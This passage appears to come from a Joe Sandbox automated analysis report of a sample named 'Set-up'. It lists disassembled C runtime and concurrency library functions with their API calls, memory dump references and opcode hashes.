                                                                                              • GetLastError.KERNEL32 ref: 6BBAAC97
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BBAACAF
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000), ref: 6BBAACBD
                                                                                                • Part of subcall function 6BBAABC4: GetModuleHandleA.KERNEL32(00000000), ref: 6BBAABDB
                                                                                                • Part of subcall function 6BBAABC4: GetModuleFileNameW.KERNEL32(6BB50000,?,00000104), ref: 6BBAABF7
                                                                                                • Part of subcall function 6BBAABC4: LoadLibraryW.KERNEL32(?), ref: 6BBAAC08
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Module$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorExceptionFileHandleLastLibraryLoadNameThreadThrow
                                                                                              • String ID:
                                                                                              • API String ID: 488853443-0
                                                                                              • Opcode ID: 26ed972ceb31594155f97c6e737a7e2e73cf4f394bd3aa0598dec790c5c7c07c
                                                                                              • Instruction ID: 330a8855ac9b62d698dbebade763f7ee1d9defbaf1d526957d9e61377a784fb0
                                                                                              • Opcode Fuzzy Hash: 26ed972ceb31594155f97c6e737a7e2e73cf4f394bd3aa0598dec790c5c7c07c
                                                                                              • Instruction Fuzzy Hash: A4F0C2329041865FDF09AFA0CC06BAE3B29EF04344F14007CF516C6161EB7AC9159FB5
                                                                                              Function 6BB60841 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$_invalid_parameter_noinfo_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 3898388434-0
                                                                                              • Opcode ID: 2e998d1568a2c84ccd5ed2564f24117d1b0d34df2c28f38bec209859c6260524
                                                                                              • Instruction ID: 428e00d19ff9969d22081ae1934e8b3b2f1cfd8145d536ae85fe8461019434ad
                                                                                              • Opcode Fuzzy Hash: 2e998d1568a2c84ccd5ed2564f24117d1b0d34df2c28f38bec209859c6260524
                                                                                              • Instruction Fuzzy Hash: BCF0E231144385EBDF115E69E8897DE3794EB04794F000065FC0496141F77CCC50CEA1
                                                                                              Function 6BB715F6 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _lock_file.MSVCR100(?,6BB71658,0000000C), ref: 6BB71621
                                                                                                • Part of subcall function 6BB6A557: _lock.MSVCR100(?,?,?,6BBB6EA0,00000040,6BBB6ED8,0000000C,6BB88676,00000000,?), ref: 6BB6A584
                                                                                              • _fwrite_nolock.MSVCR100(?,?,?,?,6BB71658,0000000C), ref: 6BB71636
                                                                                                • Part of subcall function 6BB7153C: memcpy.MSVCR100(?,?,?), ref: 6BB715D5
                                                                                                • Part of subcall function 6BB71674: _unlock_file.MSVCR100(6BB7164D,6BB7164D), ref: 6BB71677
                                                                                              • _errno.MSVCR100(6BB71658,0000000C), ref: 6BB88E41
                                                                                              • _invalid_parameter_noinfo.MSVCR100(6BB71658,0000000C), ref: 6BB88E4C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_fwrite_nolock_invalid_parameter_noinfo_lock_lock_file_unlock_filememcpy
                                                                                              • String ID:
                                                                                              • API String ID: 1711487722-0
                                                                                              • Opcode ID: 995cc92017bc9e1548d24e218c5f7f7f5a05c8598165e57f4907f58f4d7b04e0
                                                                                              • Instruction ID: 42948ea00787d547527d5730ebdb13a5b8169ae174612dcddb36d750d598a079
                                                                                              • Opcode Fuzzy Hash: 995cc92017bc9e1548d24e218c5f7f7f5a05c8598165e57f4907f58f4d7b04e0
                                                                                              • Instruction Fuzzy Hash: EBF03C349016A9EBCF11EFB4D80249E7B60AF04B54F588565A43466164E73CCA50DFB1
                                                                                              Function 6BB95C48 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ?_Abort@_StructuredTaskCollection@details@Concurrency@@AAEXXZ.MSVCR100 ref: 6BB95C68
                                                                                                • Part of subcall function 6BBA504E: ?_Cancel@_StructuredTaskCollection@details@Concurrency@@QAEXXZ.MSVCR100(?,?,?,?,?,?,?,6BB95C6D), ref: 6BBA509A
                                                                                              • __uncaught_exception.MSVCR100 ref: 6BB95C6D
                                                                                              • Concurrency::unsupported_os::unsupported_os.LIBCMT(00000001), ref: 6BB95C93
                                                                                              • _CxxThrowException.MSVCR100(6BB95CA8,6BBFFE24,00000001), ref: 6BB95CA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Collection@details@Concurrency@@StructuredTask$Abort@_Cancel@_Concurrency::unsupported_os::unsupported_osExceptionThrow__uncaught_exception
                                                                                              • String ID:
                                                                                              • API String ID: 176145414-0
                                                                                              • Opcode ID: 0e84527e0fff4a2a2d01e8211534eaa136b194d9990ca591f8dc00a65845965b
                                                                                              • Instruction ID: 414fcc63baf17e48c67bdd5c56f46760434240437c66d47fdd67ccba4411f53c
                                                                                              • Opcode Fuzzy Hash: 0e84527e0fff4a2a2d01e8211534eaa136b194d9990ca591f8dc00a65845965b
                                                                                              • Instruction Fuzzy Hash: 14F05E30C403846ACE00BA71A606B8C77B9CF0368DF4041F85A35AB452DBAED44BCB19
                                                                                              Function 6BB98E9F Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BB98EA6
                                                                                              • CloseHandle.KERNEL32(?,00000004,6BB98BA2), ref: 6BB98ED0
                                                                                              • CloseHandle.KERNEL32(?,00000004,6BB98BA2), ref: 6BB98EE4
                                                                                              • ??3@YAXPAX@Z.MSVCR100(?), ref: 6BB98F14
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$??3@H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 236738836-0
                                                                                              • Opcode ID: 3b39d395341d37aafbaa9d465110b75bef9ecf79a024a5c1eee40378e836c47c
                                                                                              • Instruction ID: b714a8d1b55468ae6832a0b4d09fd235c28c1e5fd07e970875ddb9166d3926cf
                                                                                              • Opcode Fuzzy Hash: 3b39d395341d37aafbaa9d465110b75bef9ecf79a024a5c1eee40378e836c47c
                                                                                              • Instruction Fuzzy Hash: 0BF04FB1900B808BD720AF70D89275EB2F4BF11299F60485CD5AD97250DF7DE804CBA4
                                                                                              Function 6BB6A934 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _lock_file.MSVCR100(?,?,?,?,?,?,?,6BB6A990,0000000C), ref: 6BB6A961
                                                                                                • Part of subcall function 6BB6A557: _lock.MSVCR100(?,?,?,6BBB6EA0,00000040,6BBB6ED8,0000000C,6BB88676,00000000,?), ref: 6BB6A584
                                                                                              • _fclose_nolock.MSVCR100(?,?,?,?,?,?,?,6BB6A990,0000000C), ref: 6BB6A96C
                                                                                                • Part of subcall function 6BB6A8DF: __freebuf.LIBCMT ref: 6BB6A903
                                                                                                • Part of subcall function 6BB6A8DF: _fileno.MSVCR100(?,?,?), ref: 6BB6A909
                                                                                                • Part of subcall function 6BB6A8DF: _close.MSVCR100(00000000,?,?,?), ref: 6BB6A90F
                                                                                                • Part of subcall function 6BB6A9AC: _unlock_file.MSVCR100(?,6BB6A981,?,?,?,?,?,?,6BB6A990,0000000C), ref: 6BB6A9AD
                                                                                              • _errno.MSVCR100(?,?,?,?,?,?,6BB6A990,0000000C), ref: 6BB88BC3
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,6BB6A990,0000000C), ref: 6BB88BCE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: __freebuf_close_errno_fclose_nolock_fileno_invalid_parameter_noinfo_lock_lock_file_unlock_file
                                                                                              • String ID:
                                                                                              • API String ID: 1403730806-0
                                                                                              • Opcode ID: 75be2a504d5eabd53bb2de62eaa2684bfcd0c1a3cf7f724c91e153f008714c2a
                                                                                              • Instruction ID: 3cc411b8a84aa096c13bab1aadd22e1a849bd786243d812e2d2a0bf296a4103e
                                                                                              • Opcode Fuzzy Hash: 75be2a504d5eabd53bb2de62eaa2684bfcd0c1a3cf7f724c91e153f008714c2a
                                                                                              • Instruction Fuzzy Hash: ADF0B430C017A5AADB109B79C842B5EBBA06F01378F318649D434AA1D0FB7C8E419F59
                                                                                              Function 6BB9C7DC Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BB9C7E3
                                                                                              • EnterCriticalSection.KERNEL32(?,00000004,6BB987CA,?), ref: 6BB9C7F6
                                                                                                • Part of subcall function 6BB9892E: TlsSetValue.KERNEL32(?,?,?,?,?), ref: 6BB9895B
                                                                                                • Part of subcall function 6BB9892E: GetCurrentThread.KERNEL32 ref: 6BB9898C
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6BB9C830
                                                                                              • SetEvent.KERNEL32(?), ref: 6BB9C83F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$CurrentEnterEventH_prolog3LeaveThreadValue
                                                                                              • String ID:
                                                                                              • API String ID: 2643705923-0
                                                                                              • Opcode ID: 9533e8b721ad43fd69429e96ee6a0b4b4d52279faa7d02834cfc32f8a71ea537
                                                                                              • Instruction ID: 7e0fd1a80f3859b81b5831c47c073777607dc2e713865af9d23f74a43605ff18
                                                                                              • Opcode Fuzzy Hash: 9533e8b721ad43fd69429e96ee6a0b4b4d52279faa7d02834cfc32f8a71ea537
                                                                                              • Instruction Fuzzy Hash: CEF08C718002D4EFDF01BF30D9897AD3BB0AF02348F0440A5E5116B141E77EC984CBA2
                                                                                              Function 6BBA23B9 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002), ref: 6BBA23C6
                                                                                                • Part of subcall function 6BBA214D: std::exception::exception.LIBCMT(6BBA1FE2,?,6BBA1FE2,00000001), ref: 6BBA216C
                                                                                                • Part of subcall function 6BBA214D: _CxxThrowException.MSVCR100(?,6BC00018,6BBA1FE2), ref: 6BBA2181
                                                                                              • std::exception::exception.LIBCMT(?,00000008,00000002), ref: 6BBA23DE
                                                                                              • _CxxThrowException.MSVCR100(?,6BC00034,?,00000008,00000002), ref: 6BBA23F3
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000008,00000002), ref: 6BBA23FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Policy$Concurrency@@ElementExceptionKey@2@@Policy@SchedulerThrowValue@std::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 1427302437-0
                                                                                              • Opcode ID: acb3a4ef23f5604c129f93927a4bff63f9dd8f6626cd2d344cc28c0ef9438c6a
                                                                                              • Instruction ID: 79e8f66df402cd98a6644b10774ab3dad87a6975e05345290289af448c6fc530
                                                                                              • Opcode Fuzzy Hash: acb3a4ef23f5604c129f93927a4bff63f9dd8f6626cd2d344cc28c0ef9438c6a
                                                                                              • Instruction Fuzzy Hash: 68F01971D08188BACB04EF65D442D9E7BFCDB45388F008065AA1597150DF78D644CB51
                                                                                              Function 6BB6CA89 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$_invalid_parameter_noinfo_wfsopen
                                                                                              • String ID:
                                                                                              • API String ID: 972587971-0
                                                                                              • Opcode ID: 33518f1f829daef67386d686cdd8cb7bfa0aef1fa8333d9c5588fbc4d1558859
                                                                                              • Instruction ID: f52c71ac5fb6d03b1452ccc22e74b67a7dd9bc2361f7f062959e7762a406675b
                                                                                              • Opcode Fuzzy Hash: 33518f1f829daef67386d686cdd8cb7bfa0aef1fa8333d9c5588fbc4d1558859
                                                                                              • Instruction Fuzzy Hash: A3E092316402A5ABDB215EB9AC02A9E37649F45B94F040061F9589B210FB79DC00CFC4
                                                                                              Function 6BBB6E6B Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _errno.MSVCR100(6BBB6ED8,0000000C,6BB88676,00000000,?), ref: 6BBB6E83
                                                                                              • _invalid_parameter_noinfo.MSVCR100(6BBB6ED8,0000000C,6BB88676,00000000,?), ref: 6BBB6E8E
                                                                                                • Part of subcall function 6BBDAEAE: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6BBAB84F,?,6BBAC3D3,00000003,6BB874A4,6BB6AA18,0000000C,6BB874F7,00000001,00000001), ref: 6BBDAEB5
                                                                                              • _lock_file.MSVCR100(00000040,6BBB6ED8,0000000C,6BB88676,00000000,?), ref: 6BBB6E9B
                                                                                              • _ungetc_nolock.MSVCR100(?,00000040,6BBB6ED8,0000000C,6BB88676,00000000,?), ref: 6BBB6EAB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_invalid_parameter_noinfo_lock_file_ungetc_nolock
                                                                                              • String ID:
                                                                                              • API String ID: 3962069902-0
                                                                                              • Opcode ID: cd07c99d1240b1d81f45b78a4ebd4a9ebffe70af729b31f50d4f3dcb4ccd44cf
                                                                                              • Instruction ID: 4e9cfbda0d78eb90597851741c252df73f78e0fc4275446ea8a913f7faddf726
                                                                                              • Opcode Fuzzy Hash: cd07c99d1240b1d81f45b78a4ebd4a9ebffe70af729b31f50d4f3dcb4ccd44cf
                                                                                              • Instruction Fuzzy Hash: 92F01C31805285EADB10AFB9DC026AE7BA0AF00378F60C666E025991E0EF7D8E419F14
                                                                                              Function 6BB71868 Relevance: 6.0, APIs: 4, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _lock_file.MSVCR100(?,6BB718B8,0000000C), ref: 6BB71887
                                                                                                • Part of subcall function 6BB6A557: _lock.MSVCR100(?,?,?,6BBB6EA0,00000040,6BBB6ED8,0000000C,6BB88676,00000000,?), ref: 6BB6A584
                                                                                              • _ftell_nolock.MSVCR100(?,6BB718B8,0000000C), ref: 6BB71894
                                                                                                • Part of subcall function 6BB717C4: _fileno.MSVCR100(?), ref: 6BB717DD
                                                                                                • Part of subcall function 6BB717C4: _lseek.MSVCR100(00000000,00000000,00000001), ref: 6BB717F5
                                                                                                • Part of subcall function 6BB718D4: _unlock_file.MSVCR100(?,6BB718A9,6BB718B8,0000000C), ref: 6BB718D7
                                                                                              • _errno.MSVCR100(6BB718B8,0000000C), ref: 6BB88DF8
                                                                                              • _invalid_parameter_noinfo.MSVCR100(6BB718B8,0000000C), ref: 6BB88E03
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_fileno_ftell_nolock_invalid_parameter_noinfo_lock_lock_file_lseek_unlock_file
                                                                                              • String ID:
                                                                                              • API String ID: 2873353448-0
                                                                                              • Opcode ID: 17da05210cde6ab2a9f58a95a64b230d3afdb8fa54cf79a66e6137ded92dbfee
                                                                                              • Instruction ID: 0007e216e2e20603dc66f18333cb4878457e9891eff3ecfa0cc69ef729da13ba
                                                                                              • Opcode Fuzzy Hash: 17da05210cde6ab2a9f58a95a64b230d3afdb8fa54cf79a66e6137ded92dbfee
                                                                                              • Instruction Fuzzy Hash: 12F06530801295FBDF20AF75DC4379D3BA0AF00368F648265A034991D0EF7C8941DF64
                                                                                              Function 6BB9B13F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 6BB9615A: TlsGetValue.KERNEL32(?,6BBA558F,00000000,6BBA5EC0,?,?,?,00000000,?,?,?,6BBA5DCC,00000001), ref: 6BB9616F
                                                                                              • std::exception::exception.LIBCMT(?), ref: 6BB9B171
                                                                                                • Part of subcall function 6BBD3502: std::exception::_Copy_str.LIBCMT(6BBA2171,?,?,6BBA2171,6BBA1FE2,?,6BBA1FE2,00000001), ref: 6BBD351D
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFF4C,?), ref: 6BB9B186
                                                                                                • Part of subcall function 6BB777D4: RaiseException.KERNEL32(?,?,6BB8F317,?,?,?,?,?,6BB8F317,?,6BB6BDD8,6BC07580), ref: 6BB77813
                                                                                              Strings
                                                                                              • Lock already taken as a writer, xrefs: 6BB9B16A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Exception$Copy_strRaiseThrowValuestd::exception::_std::exception::exception
                                                                                              • String ID: Lock already taken as a writer
                                                                                              • API String ID: 323788321-3737755527
                                                                                              • Opcode ID: 5dd1b7a8cb12380b4c1e30f4e1c465ed043553349c137da339db8788c68fb8b9
                                                                                              • Instruction ID: 24db5842dd59618ab77b6046e7252f9be9ec2bb6d210a2289ed98072ec118ff6
                                                                                              • Opcode Fuzzy Hash: 5dd1b7a8cb12380b4c1e30f4e1c465ed043553349c137da339db8788c68fb8b9
                                                                                              • Instruction Fuzzy Hash: D4210731A102599FCB21EF64D880B9EF7B0FF42365F1081B8D5269B250CB38E906CF90
                                                                                              Function 6BB6380F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo
                                                                                              • String ID: B
                                                                                              • API String ID: 2959964966-1255198513
                                                                                              • Opcode ID: 3393d93fd42d188c5bfc2d9a1213c1dfa9bde3f474556dc49e0ecf46112e7932
                                                                                              • Instruction ID: 7fc6331da2aa3e55ea6f510c75429bd29896f933d32980a084508e280b16e6a1
                                                                                              • Opcode Fuzzy Hash: 3393d93fd42d188c5bfc2d9a1213c1dfa9bde3f474556dc49e0ecf46112e7932
                                                                                              • Instruction Fuzzy Hash: B7F0627490024EABDF048F65C8015EEBBB5FF84328F108225E924712D0D7798111CFA4
                                                                                              Function 6BB77D2D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DecodePointer.KERNEL32(00000001,6BB6B0D8,6BB6BDD8,00000000,00000001), ref: 6BB77D51
                                                                                              • free.MSVCR100(?), ref: 6BB77D77
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: DecodePointerfree
                                                                                              • String ID: csm
                                                                                              • API String ID: 2443025543-1018135373
                                                                                              • Opcode ID: 02f8122a9d44f5beef324606df87255f6e8aadd2bc438feea7ae491f8b8642a7
                                                                                              • Instruction ID: 8d165b4d280c697bb3355b5d19e4ef6736563e32c167627fc9a7319d6046a92f
                                                                                              • Opcode Fuzzy Hash: 02f8122a9d44f5beef324606df87255f6e8aadd2bc438feea7ae491f8b8642a7
                                                                                              • Instruction Fuzzy Hash: C2F0BE75606B809BDB34AE33C840D2A73BDEF113513640AACE4B5CA820EBA8D981C780
                                                                                              Function 6BBD583C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
